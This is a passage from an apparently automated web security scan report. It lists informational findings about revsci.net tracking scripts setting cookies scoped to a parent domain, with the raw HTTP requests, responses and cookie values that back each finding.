Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30xvkVUA6Ab/nfpD5Q==; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zvUZeC6gb/mh9D/g==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:06 GMT; Path=/
Set-Cookie: NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e82&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:06 GMT; Path=/
X-Proc-ms: 30
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:13:06 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

11.181. http://pix04.revsci.net/F08747/b3/0/3/1003161/591799300.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/591799300.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbWkv8fV+8er9duzVms+8pMh; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:24 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b4&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:24 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/591799300.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbWkv8fV+8er9duzVms+8pMh; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:24 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b4&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:24 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:24 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.182. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/605657366.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt34zskdUB6Ab/neJD5g==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
NETID01=TUl0eAwBEwoAAEDC0IAAAACS; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:12:56 GMT; Path=/
udm_0=MLvv7iEOIS5n5S4sf9LIKtCBJlhlZ4wlO6B9VyvkGoyzMH7D2WQp3ftWI0PMoz9Hh9fKDp1/mUeaTVZAD2sUmSEumxXf7qTHeaTajtWig78dOo0vtnm9lh8+PcN1S2PGKsPZZhZd3IPo8wA3CBgyCxs8roLRagKRmKL+IMR2fkwptAZa7ZnjONj5PBl6mDenKzm6tvDzGiI2xJiEk+JZoEy3cJ7GsQ44kugPJQK2nLpvRboqevnJkiBn6cJUdF9g9l3Et37CRe44hpuXi4fQkPD6PSZagwqV8pwbYPDiSFUj/WYyu4jDKt6kZPsKfD8M97H9xnvsE8qaHADuNwoV3tqyK7nasBcM7aGO5JMRBtADmLpzlYS49Sgt+u92fAIOU8AWl4KqYMZQI63CJllHgWon/3yB0KkEhW5Ny6TGpSnYrUPRdHHIuyXVTbI2gihM4dqmj4m4wN4Z7tLwGL08cATb+7MzVV0mVwn4K9KsfwH9fFRLpJ+FUxk4edQ0kYnub2d/j8VnHB5QhQQgzJCswhu/UdS2f1SiTrmriDroOArOp6Z03WAkULU7; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/605657366.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt34zskdUB6Ab/neJD5g==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
Set-Cookie: NETID01=TUl0eAwBEwoAAEDC0IAAAACS; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:12:56 GMT; Path=/
Set-Cookie: udm_0=MLvv7iEOIS5n5S4sf9LIKtCBJlhlZ4wlO6B9VyvkGoyzMH7D2WQp3ftWI0PMoz9Hh9fKDp1/mUeaTVZAD2sUmSEumxXf7qTHeaTajtWig78dOo0vtnm9lh8+PcN1S2PGKsPZZhZd3IPo8wA3CBgyCxs8roLRagKRmKL+IMR2fkwptAZa7ZnjONj5PBl6mDenKzm6tvDzGiI2xJiEk+JZoEy3cJ7GsQ44kugPJQK2nLpvRboqevnJkiBn6cJUdF9g9l3Et37CRe44hpuXi4fQkPD6PSZagwqV8pwbYPDiSFUj/WYyu4jDKt6kZPsKfD8M97H9xnvsE8qaHADuNwoV3tqyK7nasBcM7aGO5JMRBtADmLpzlYS49Sgt+u92fAIOU8AWl4KqYMZQI63CJllHgWon/3yB0KkEhW5Ny6TGpSnYrUPRdHHIuyXVTbI2gihM4dqmj4m4wN4Z7tLwGL08cATb+7MzVV0mVwn4K9KsfwH9fFRLpJ+FUxk4edQ0kYnub2d/j8VnHB5QhQQgzJCswhu/UdS2f1SiTrmriDroOArOp6Z03WAkULU7; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:12:56 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

11.183. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/605657366.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LC16GSieI1VkRva98=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:36 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647c&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/605657366.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LC16GSieI1VkRva98=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:36 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647c&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:36 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:35 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.184. http://pix04.revsci.net/F08747/b3/0/3/1003161/664658967.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/664658967.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl+HSaKI0VkQza9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:12 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:12 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/664658967.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; 